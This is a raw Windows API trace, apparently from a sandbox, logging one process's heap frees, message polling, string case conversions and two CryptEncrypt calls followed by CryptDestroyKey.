[0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.057] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.057] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0207.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.058] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.058] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.058] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.059] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0207.059] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0207.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d44e8 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.063] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x12283, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x12288) returned 1 [0207.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.064] CharLowerBuffW (in: lpsz="byte[74376]", cchLength=0xb | out: lpsz="byte[74376]") returned 0xb [0207.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.065] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.065] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.065] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.065] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.065] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.065] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.065] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d44e8*, pdwDataLen=0x8bef68*=0x12283, dwBufLen=0x12288 | out: pbData=0x34d44e8*, pdwDataLen=0x8bef68*=0x12288) returned 1 [0207.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.076] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.076] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.076] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.076] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.076] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.076] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.076] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.076] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.076] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.076] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.077] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.077] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.077] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.077] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.077] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.077] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.077] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.077] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.077] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.077] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.086] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.086] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.086] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0207.086] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.086] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0207.086] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.086] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.086] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.086] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.087] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.087] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.087] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.087] CryptDestroyKey (hKey=0xaa5820) returned 1 [0207.087] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.087] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.087] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.087] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.087] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.087] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.087] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.088] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.088] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.088] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.088] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.088] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.088] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.088] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.088] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.088] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.088] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.088] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.088] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.088] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.088] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.088] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.088] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.089] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.089] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.089] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.089] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd 